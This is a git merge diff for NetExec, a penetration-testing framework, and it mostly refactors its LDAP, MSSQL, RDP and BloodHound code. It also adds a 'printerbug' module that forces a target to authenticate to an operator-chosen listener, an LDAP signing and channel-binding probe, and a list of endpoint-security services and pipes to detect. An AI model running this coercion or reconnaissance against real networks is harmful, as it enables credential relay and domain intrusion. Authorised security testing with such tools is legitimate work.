Merge branch 'main' into neff-ldap-domain

main
Alex 2024-03-24 16:23:13 +01:00 committed by GitHub
commit 09a50d8043
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
23 changed files with 476 additions and 252 deletions

View File

@ -87,8 +87,8 @@ class connection:
self.port = self.args.port
self.conn = None
self.admin_privs = False
self.password = None
self.username = None
self.password = ""
self.username = ""
self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey)
self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost

View File

@ -13,7 +13,7 @@ bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
bh_pass = bloodhoundcommunityedition
[Empire]
api_host = 127.0.0.1

View File

@ -52,14 +52,14 @@ def add_user_bh(user, domain, logger, config):
_add_with_domain(user_info, domain, tx, logger)
except AuthError:
logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
return
exit()
except ServiceUnavailable:
logger.fail(f"Neo4J does not seem to be available on {uri}.")
return
exit()
except Exception as e:
logger.fail(f"Unexpected error with Neo4J: {e}")
return
driver.close()
finally:
driver.close()
def _add_with_domain(user_info, domain, tx, logger):

View File

@ -16,13 +16,11 @@ class NXCAdapter(logging.LoggerAdapter):
logging.basicConfig(
format="%(message)s",
datefmt="[%X]",
handlers=[
RichHandler(
console=nxc_console,
rich_tracebacks=True,
tracebacks_show_locals=False,
)
],
handlers=[RichHandler(
console=nxc_console,
rich_tracebacks=True,
tracebacks_show_locals=False
)],
)
self.logger = logging.getLogger("nxc")
self.extra = extra
@ -40,30 +38,21 @@ class NXCAdapter(logging.LoggerAdapter):
if self.extra is None:
return f"{msg}", kwargs
if "module_name" in self.extra and len(self.extra["module_name"]) > 8:
if "module_name" in self.extra and len(self.extra["module_name"]) > 11:
self.extra["module_name"] = self.extra["module_name"][:8] + "..."
# If the logger is being called when hooking the 'options' module function
if len(self.extra) == 1 and ("module_name" in self.extra):
return (
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}",
kwargs,
)
return (f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}", kwargs)
# If the logger is being called from nxcServer
if len(self.extra) == 2 and ("module_name" in self.extra) and ("host" in self.extra):
return (
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
kwargs,
)
return (f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}", kwargs)
# If the logger is being called from a protocol
module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"]) if "module_name" in self.extra else colored(self.extra["protocol"], "blue", attrs=["bold"])
return (
f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
kwargs,
)
return (f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}", kwargs)
def display(self, msg, *args, **kwargs):
"""Display text to console, formatted for nxc"""
@ -104,17 +93,7 @@ class NXCAdapter(logging.LoggerAdapter):
if len(self.logger.handlers):
try:
for handler in self.logger.handlers:
handler.handle(
LogRecord(
"nxc",
20,
"",
kwargs,
msg=text,
args=args,
exc_info=None,
)
)
handler.handle(LogRecord("nxc", 20, "", kwargs, msg=text, args=args, exc_info=None))
except Exception as e:
self.logger.fail(f"Issue while trying to custom print handler: {e}")
else:

View File

@ -35,7 +35,7 @@ class NXCModule:
results = self._detect_installed_services(context, connection, target)
self.detect_running_processes(context, connection, results)
self.dump_results(results, connection.hostname, context)
self.dump_results(results, context)
def _get_target(self, connection):
return connection.host if not connection.kerberos else f"{connection.hostname}.{connection.domain}"
@ -58,18 +58,16 @@ class NXCModule:
dce, _ = lsa.connect()
policyHandle = lsa.open_policy(dce)
try:
for product in conf["products"]:
for service in product["services"]:
for product in conf["products"]:
for service in product["services"]:
try:
lsa.LsarLookupNames(dce, policyHandle, service["name"])
context.log.info(f"Detected installed service on {connection.host}: {product['name']} {service['description']}")
results.setdefault(product["name"], {"services": []})["services"].append(service)
except Exception:
pass
except Exception:
pass
except Exception as e:
context.log.fail(str(e))
return results
def detect_running_processes(self, context, connection, results):
@ -80,13 +78,16 @@ class NXCModule:
for product in conf["products"]:
for pipe in product["pipes"]:
if pathlib.PurePath(fl).match(pipe["name"]):
context.log.debug(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})")
context.log.info(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})")
prod_results = results.setdefault(product["name"], {})
prod_results.setdefault("pipes", []).append(pipe)
except Exception as e:
context.log.debug(str(e))
if "STATUS_ACCESS_DENIED" in str(e):
context.log.fail("Error STATUS_ACCESS_DENIED while enumerating pipes, probably due to using SMBv1")
else:
context.log.fail(str(e))
def dump_results(self, results, remoteName, context):
def dump_results(self, results, context):
if not results:
context.log.highlight("Found NOTHING!")
return
@ -261,7 +262,10 @@ conf = {
{"name": "epfw", "description": "ESET"},
{"name": "epfwlwf", "description": "ESET"},
{"name": "epfwwfp", "description": "ESET"},
{"name": "EraAgentSvc", "description": "ESET"},
{"name": "EraAgentSvc", "description": "ESET Management Agent service"},
{"name": "ERAAgent", "description": "ESET Management Agent service"},
{"name": "efwd", "description": "ESET Communication Forwarding Service"},
{"name": "ehttpsrv", "description": "ESET HTTP Server"},
],
"pipes": [{"name": "nod_scriptmon_pipe", "processes": [""]}],
},

View File

@ -146,7 +146,7 @@ class NXCModule:
@staticmethod
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
host_id = context.db.get_computers(connection.host)[0][0]
host_id = context.db.get_hosts(connection.host)[0][0]
if password is not None:
credential_type = "plaintext"
else:

View File

@ -39,10 +39,15 @@ class NXCModule:
async def run_ldaps_noEPA(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential)
_, err = await ldapsClientConn.connect()
# Required step to try to bind without channel binding
ldapsClientConn.cb_data = None
if err is not None:
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
sys.exit()
_, err = await ldapsClientConn.bind()
valid, err = await ldapsClientConn.bind()
if "data 80090346" in str(err):
return True # channel binding IS enforced
elif "data 52e" in str(err):
@ -114,19 +119,30 @@ class NXCModule:
# requirements are enforced based on potential errors
# during the bind attempt.
async def run_ldap(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential)
_, err = await ldapsClientConn.connect()
if err is None:
_, err = await ldapsClientConn.bind()
if "stronger" in str(err):
return True # because LDAP server signing requirements ARE enforced
elif ("data 52e") in str(err):
context.log.fail("Not connected... exiting")
sys.exit()
elif err is None:
try:
ldapsClientConn = MSLDAPClientConnection(target, credential)
ldapsClientConn._disable_signing = True
_, err = await ldapsClientConn.connect()
if err is not None:
context.log.fail(str(err))
return False
else:
context.log.fail(str(err))
_, err = await ldapsClientConn.bind()
if err is not None:
errstr = str(err).lower()
if "stronger" in errstr:
return True
# because LDAP server signing requirements ARE enforced
else:
context.log.fail(str(err))
else:
# LDAPS bind successful
return False
# because LDAP server signing requirements are not enforced
except Exception as e:
context.log.debug(str(e))
return False
# Run trough all our code blocks to determine LDAP signing and channel binding settings.
stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
@ -148,9 +164,8 @@ class NXCModule:
stype=stype,
)
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
target = MSLDAPTarget(connection.host, 389, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapIsProtected = asyncio.run(run_ldap(target, credential))
if ldapIsProtected is False:
context.log.highlight("LDAP Signing NOT Enforced!")
elif ldapIsProtected is True:
@ -162,7 +177,7 @@ class NXCModule:
if DoesLdapsCompleteHandshake(connection.host) is True:
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True:
context.log.highlight('LDAPS Channel Binding is set to "When Supported"')

117
nxc/modules/printerbug.py Normal file
View File

@ -0,0 +1,117 @@
from impacket.dcerpc.v5 import transport, rprn
class NXCModule:
name = "printerbug"
description = "Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion."
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.listener = None
def options(self, context, module_options):
"""LISTENER Listener Address (defaults to 127.0.0.1)"""
self.listener = "127.0.0.1"
if "LISTENER" in module_options:
self.listener = module_options["LISTENER"]
def on_login(self, context, connection):
trigger = TriggerAuth(context)
target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
dce = trigger.connect(
username=connection.username,
password=connection.password,
domain=connection.domain,
lmhash=connection.lmhash,
nthash=connection.nthash,
target=target,
doKerberos=connection.kerberos,
dcHost=connection.kdcHost,
aesKey=connection.aesKey,
)
if dce is not None:
context.log.debug("Target is vulnerable to PrinterBug")
trigger.RpcRemoteFindFirstPrinterChange(dce, self.listener, target)
context.log.highlight("VULNERABLE")
dce.disconnect()
else:
context.log.debug("Target is not vulnerable to PrinterBug")
################################################################################
# RPC CALLS
################################################################################
class TriggerAuth:
def __init__(self, context):
self.context = context
def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):
rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\spoolss]" % target)
rpctransport.set_dport(445)
if hasattr(rpctransport, "set_credentials"):
rpctransport.set_credentials(
username=username,
password=password,
domain=domain,
lmhash=lmhash,
nthash=nthash,
aesKey=aesKey,
)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
rpctransport.setRemoteHost(target)
dce = rpctransport.get_dce_rpc()
self.context.log.debug("Connecting to {}".format(r"ncacn_np:%s[\PIPE\spoolfs]") % target)
try:
dce.connect()
except Exception as e:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
return None
try:
dce.bind(rprn.MSRPC_UUID_RPRN)
except Exception as e:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
return None
self.context.log.debug("Successfully bound!")
return dce
def RpcRemoteFindFirstPrinterChange(self, dce, listener, target):
self.context.log.debug("Sending RpcRemoteFindFirstPrinterChange!")
try:
resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
except Exception as e:
if str(e).find("Broken pipe") >= 0:
# The connection timed-out. Let's try to bring it back next round
self.context.log.error("Connection failed - skipping host!")
return
elif str(e).upper().find("ACCESS_DENIED"):
# We're not admin, bye
self.context.log.error("Access denied - RPC call was denied")
dce.disconnect()
return
else:
raise
self.context.log.debug("Got handle")
try:
request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
request["hPrinter"] = resp["pHandle"]
request["fdwFlags"] = rprn.PRINTER_CHANGE_ADD_JOB
request["pszLocalMachine"] = "\\\\%s\x00" % listener
except Exception as e:
self.context.log.debug(e)
try:
dce.request(request)
except Exception as e:
self.context.log.debug(e)

View File

@ -1,92 +1,111 @@
from dateutil.relativedelta import relativedelta as rd
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.ldap import ldap as ldap_impacket
from math import fabs
class NXCModule:
"""
Created by fplazar and wanetty
Module by @gm_eduard and @ferranplaza
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py
"""
Initial FGPP/PSO script written by @n00py: https://github.com/n00py/GetFGPP
Module by @_sandw1ch
"""
name = "pso"
description = "Query to get PSO from LDAP"
description = "Module to get the Fine Grained Password Policy/PSOs"
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = True
multiple_hosts = False
pso_fields = [
"cn",
"msDS-PasswordReversibleEncryptionEnabled",
"msDS-PasswordSettingsPrecedence",
"msDS-MinimumPasswordLength",
"msDS-PasswordHistoryLength",
"msDS-PasswordComplexityEnabled",
"msDS-LockoutObservationWindow",
"msDS-LockoutDuration",
"msDS-LockoutThreshold",
"msDS-MinimumPasswordAge",
"msDS-MaximumPasswordAge",
"msDS-PSOAppliesTo",
]
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
def options(self, context, module_options):
"""No options available."""
def convert_time_field(self, field, value):
time_fields = {"msDS-LockoutObservationWindow": (60, "mins"), "msDS-MinimumPasswordAge": (86400, "days"), "msDS-MaximumPasswordAge": (86400, "days"), "msDS-LockoutDuration": (60, "mins")}
if field in time_fields:
value = f"{int(fabs(float(value)) / (10000000 * time_fields[field][0]))} {time_fields[field][1]}"
return value
def on_login(self, context, connection):
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
# Building the search filter
search_filter = "(objectClass=msDS-PasswordSettings)"
# Are there even any FGPPs?
context.log.success("Attempting to enumerate policies...")
resp = connection.ldapConnection.search(searchBase=f"CN=Password Settings Container,CN=System,{''.join([f'DC={dc},' for dc in connection.domain.split('.')]).rstrip(',')}", searchFilter="(objectclass=*)")
if len(resp) > 1:
context.log.highlight(f"{len(resp) - 1} PSO Objects found!")
context.log.highlight("")
context.log.success("Attempting to enumerate objects with an applied policy...")
try:
context.log.debug(f"Search Filter={search_filter}")
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=self.pso_fields, sizeLimit=0)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find("sizeLimitExceeded") >= 0:
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
else:
context.log.debug(e)
return False
pso_list = []
context.log.debug(f"Total of records returned {len(resp)}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
# Who do they apply to?
resp = connection.search(searchFilter="(objectclass=*)", attributes=["DistinguishedName", "msDS-PSOApplied"])
for attrs in resp:
if isinstance(attrs, ldapasn1_impacket.SearchResultEntry) is not True:
continue
for attr in attrs["attributes"]:
if str(attr["type"]) in "msDS-PSOApplied":
context.log.highlight(f"Object: {attrs['objectName']}")
context.log.highlight("Applied Policy: ")
for value in attr["vals"]:
context.log.highlight(f"\t{value}")
context.log.highlight("")
pso_info = {}
# Let"s find out even more details!
context.log.success("Attempting to enumerate details...\n")
resp = connection.search(searchFilter="(objectclass=msDS-PasswordSettings)",
attributes=["name", "msds-lockoutthreshold", "msds-psoappliesto", "msds-minimumpasswordlength",
"msds-passwordhistorylength", "msds-lockoutobservationwindow", "msds-lockoutduration",
"msds-passwordsettingsprecedence", "msds-passwordcomplexityenabled", "Description",
"msds-passwordreversibleencryptionenabled", "msds-minimumpasswordage", "msds-maximumpasswordage"])
for attrs in resp:
if not isinstance(attrs, ldapasn1_impacket.SearchResultEntry):
continue
policyName, description, passwordLength, passwordhistorylength, lockoutThreshold, obersationWindow, lockoutDuration, complexity, minPassAge, maxPassAge, reverseibleEncryption, precedence, policyApplies = ("",) * 13
for attr in attrs["attributes"]:
if str(attr["type"]) == "name":
policyName = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutThreshold":
lockoutThreshold = attr["vals"][0]
elif str(attr["type"]) == "msDS-MinimumPasswordLength":
passwordLength = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordHistoryLength":
passwordhistorylength = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutObservationWindow":
observationWindow = attr["vals"][0]
elif str(attr["type"]) == "msDS-LockoutDuration":
lockoutDuration = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordSettingsPrecedence":
precedence = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordComplexityEnabled":
complexity = attr["vals"][0]
elif str(attr["type"]) == "msDS-PasswordReversibleEncryptionEnabled":
reverseibleEncryption = attr["vals"][0]
elif str(attr["type"]) == "msDS-MinimumPasswordAge":
minPassAge = attr["vals"][0]
elif str(attr["type"]) == "msDS-MaximumPasswordAge":
maxPassAge = attr["vals"][0]
elif str(attr["type"]) == "description":
description = attr["vals"][0]
elif str(attr["type"]) == "msDS-PSOAppliesTo":
policyApplies = ""
for value in attr["vals"]:
policyApplies += f"{value};"
context.log.highlight(f"Policy Name: {policyName}")
if description:
context.log.highlight(f"Description: {description}")
context.log.highlight(f"Minimum Password Length: {passwordLength}")
context.log.highlight(f"Minimum Password History Length: {passwordhistorylength}")
context.log.highlight(f"Lockout Threshold: {lockoutThreshold}")
context.log.highlight(f"Observation Window: {mins(observationWindow)}")
context.log.highlight(f"Lockout Duration: {mins(lockoutDuration)}")
context.log.highlight(f"Complexity Enabled: {complexity}")
context.log.highlight(f"Minimum Password Age: {days(minPassAge)}")
context.log.highlight(f"Maximum Password Age: {days(maxPassAge)}")
context.log.highlight(f"Reversible Encryption: {reverseibleEncryption}")
context.log.highlight(f"Precedence: {precedence} (Lower is Higher Priority)")
context.log.highlight("Policy Applies to:")
for value in str(policyApplies)[:-1].split(";"):
if value:
context.log.highlight(f"\t{value}")
context.log.highlight("")
try:
for attribute in item["attributes"]:
attr_name = str(attribute["type"])
if attr_name in self.pso_fields:
pso_info[attr_name] = attribute["vals"][0]._value.decode("utf-8")
pso_list.append(pso_info)
def days(ldap_time):
return f"{rd(seconds=int(abs(int(ldap_time)) / 10000000)).days} days"
except Exception as e:
context.log.debug("Exception:", exc_info=True)
context.log.debug(f"Skipping item, cannot process due to error {e}")
if len(pso_list) > 0:
context.log.success("Password Settings Objects (PSO) found:")
for pso in pso_list:
for field in self.pso_fields:
if field in pso:
value = self.convert_time_field(field, pso[field])
context.log.highlight(f"{field}: {value}")
context.log.highlight("-----")
else:
context.log.info("No Password Settings Objects (PSO) found.")
def mins(ldap_time):
return f"{rd(seconds=int(abs(int(ldap_time)) / 10000000)).minutes} minutes"

View File

@ -79,6 +79,7 @@ def main():
else:
nxc_logger.logger.setLevel(logging.ERROR)
root_logger.setLevel(logging.ERROR)
logging.getLogger("neo4j").setLevel(logging.ERROR)
# if these are the same, it might double log to file (two FileHandlers will be added)
# but this should never happen by accident

View File

@ -0,0 +1,13 @@
from impacket.ldap import ldapasn1 as ldapasn1_impacket
def parse_result_attributes(ldap_response):
parsed_response = []
for entry in ldap_response:
# SearchResultReferences may be returned
if not isinstance(entry, ldapasn1_impacket.SearchResultEntry):
continue
attribute_map = {}
for attribute in entry["attributes"]:
attribute_map[str(attribute["type"])] = str(attribute["vals"][0])
parsed_response.append(attribute_map)
return parsed_response

View File

@ -5,7 +5,7 @@ import hmac
import os
import socket
from binascii import hexlify
from datetime import datetime
from datetime import datetime, timedelta
from re import sub, I
from zipfile import ZipFile
from termcolor import colored
@ -38,6 +38,7 @@ from nxc.logger import NXCAdapter, nxc_logger
from nxc.protocols.ldap.bloodhound import BloodHound
from nxc.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB
from nxc.protocols.ldap.kerberos import KerberosAttacks
from nxc.parsers.ldap_results import parse_result_attributes
ldap_error_status = {
"1": "STATUS_NOT_SUPPORTED",
@ -287,7 +288,7 @@ class ldap(connection):
# Re-connect since we logged off
self.create_conn_obj()
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}".replace(":", "-"))
def print_host_info(self):
self.logger.debug("Printing host info for LDAP")
@ -370,12 +371,11 @@ class ldap(connection):
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
out = f"{domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -432,7 +432,7 @@ class ldap(connection):
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -488,7 +488,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -516,7 +516,7 @@ class ldap(connection):
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -582,7 +582,7 @@ class ldap(connection):
self.logger.extra["port"] = "636" if (self.args.gmsa or self.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -609,7 +609,7 @@ class ldap(connection):
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -751,37 +751,51 @@ class ldap(connection):
return False
def users(self):
# Building the search filter
search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
attributes = [
"sAMAccountName",
"description",
"badPasswordTime",
"badPwdCount",
"pwdLastSet",
]
"""
Retrieves user information from the LDAP server.
Args:
----
input_attributes (list): Optional. List of attributes to retrieve for each user.
Returns:
-------
None
"""
if len(self.args.users) > 0:
self.logger.debug(f"Dumping users: {', '.join(self.args.users)}")
search_filter = f"(|{''.join(f'(sAMAccountName={user})' for user in self.args.users)})"
else:
self.logger.debug("Trying to dump all users")
search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
# default to these attributes to mirror the SMB --users functionality
request_attributes = ["sAMAccountName", "description", "badPwdCount", "pwdLastSet"]
resp = self.search(search_filter, request_attributes, sizeLimit=0)
resp = self.search(search_filter, attributes, sizeLimit=0)
if resp:
self.logger.display(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ""
description = ""
try:
if self.username == "":
self.logger.highlight(f"{item['objectName']}")
else:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
elif str(attribute["type"]) == "description":
description = str(attribute["vals"][0])
self.logger.highlight(f"{sAMAccountName:<30} {description}")
except Exception as e:
self.logger.debug(f"Skipping item, cannot process due to error {e}")
return
# I think this was here for anonymous ldap bindings, so I kept it, but we might just want to remove it
if self.username == "":
self.logger.display(f"Total records returned: {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
self.logger.highlight(f"{item['objectName']}")
return
users = parse_result_attributes(resp)
# we print the total records after we parse the results since often SearchResultReferences are returned
self.logger.display(f"Total records returned: {len(users):d}")
self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
for user in users:
# TODO: functionize this - we do this calculation in a bunch of places, different, including in the `pso` module
timestamp_seconds = int(user.get("pwdLastSet", "")) / 10**7
start_date = datetime(1601, 1, 1)
parsed_pw_last_set = (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")
if parsed_pw_last_set == "1601-01-01 00:00:00":
parsed_pw_last_set = "<never>"
# we default attributes to blank strings if they don't exist in the dict
self.logger.highlight(f"{user.get('sAMAccountName', ''):<30}{parsed_pw_last_set:<20}{user.get('badPwdCount', ''):<8}{user.get('description', ''):<60}")
def groups(self):
# Building the search filter
@ -851,7 +865,7 @@ class ldap(connection):
elif str(attribute["type"]) == "userAccountControl":
userAccountControl = int(attribute["vals"][0])
account_disabled = userAccountControl & 2
if not account_disabled:
if not account_disabled:
self.logger.highlight(f"{sAMAccountName}")
except Exception as e:
self.logger.debug(f"Skipping item, cannot process due to error {e}")
@ -1373,15 +1387,18 @@ class ldap(connection):
num_workers=10,
disable_pooling=False,
timestamp=timestamp,
fileNamePrefix=self.output_filename.split("/")[-1],
computerfile=None,
cachefile=None,
exclude_dcs=False,
)
self.output_filename += f"_{timestamp}"
self.logger.highlight(f"Compressing output into {self.output_filename}bloodhound.zip")
list_of_files = os.listdir(os.getcwd())
with ZipFile(self.output_filename + "bloodhound.zip", "w") as z:
for each_file in list_of_files:
if each_file.startswith(timestamp) and each_file.endswith("json"):
if each_file.startswith(self.output_filename.split("/")[-1]) and each_file.endswith("json"):
z.write(each_file)
os.remove(each_file)

View File

@ -44,17 +44,7 @@ class BloodHound:
# Create an object resolver
self.ad.create_objectresolver(self.pdc)
def run(
self,
collect,
num_workers=10,
disable_pooling=False,
timestamp="",
computerfile="",
cachefile=None,
exclude_dcs=False,
):
def run(self, collect, num_workers=10, disable_pooling=False, timestamp="", fileNamePrefix="", computerfile="", cachefile=None, exclude_dcs=False):
start_time = time.time()
if cachefile:
self.ad.load_cachefile(cachefile)
@ -82,7 +72,7 @@ class BloodHound:
)
# Initialize enumerator
membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
membership_enum.enumerate_memberships(timestamp=timestamp)
membership_enum.enumerate_memberships(timestamp=timestamp, fileNamePrefix=fileNamePrefix)
elif "container" in collect:
# Fetch domains for later, computers if needed
self.pdc.prefetch_info(
@ -92,7 +82,7 @@ class BloodHound:
)
# Initialize enumerator
membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
membership_enum.do_container_collection(timestamp=timestamp)
membership_enum.do_container_collection(timestamp=timestamp, fileNamePrefix=fileNamePrefix)
elif do_computer_enum:
# We need to know which computers to query regardless
# We also need the domains to have a mapping from NETBIOS -> FQDN for local admins
@ -102,7 +92,7 @@ class BloodHound:
self.pdc.get_domains("acl" in collect)
if "trusts" in collect or "acl" in collect or "objectprops" in collect:
trusts_enum = DomainEnumerator(self.ad, self.pdc)
trusts_enum.dump_domain(collect, timestamp=timestamp)
trusts_enum.dump_domain(collect, timestamp=timestamp, fileNamePrefix=fileNamePrefix)
if do_computer_enum:
# If we don't have a GC server, don't use it for deconflictation
have_gc = len(self.ad.gcs()) > 0
@ -114,7 +104,7 @@ class BloodHound:
computerfile=computerfile,
exclude_dcs=exclude_dcs,
)
computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp)
computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp, fileNamePrefix=fileNamePrefix)
end_time = time.time()
minutes, seconds = divmod(int(end_time - start_time), 60)
self.logger.highlight("Done in %02dM %02dS" % (minutes, seconds))

View File

@ -16,7 +16,7 @@ def proto_args(parser, std_parser, module_parser):
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users")
vgroup.add_argument("--users", nargs="*", help="Enumerate enabled domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
vgroup.add_argument("--dc-list", action="store_true", help="Enumerate Domain Controllers")
vgroup.add_argument("--get-sid", action="store_true", help="Get domain sid")

View File

@ -189,7 +189,7 @@ class mssql(connection):
raise
self.check_if_admin()
self.logger.success(f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}")
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
@ -222,7 +222,7 @@ class mssql(connection):
self.check_if_admin()
out = f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
@ -261,7 +261,7 @@ class mssql(connection):
self.check_if_admin()
out = f"{self.domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)

View File

@ -243,7 +243,7 @@ class rdp(connection):
self.mark_pwned(),
)
)
if not self.args.local_auth:
if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -289,7 +289,7 @@ class rdp(connection):
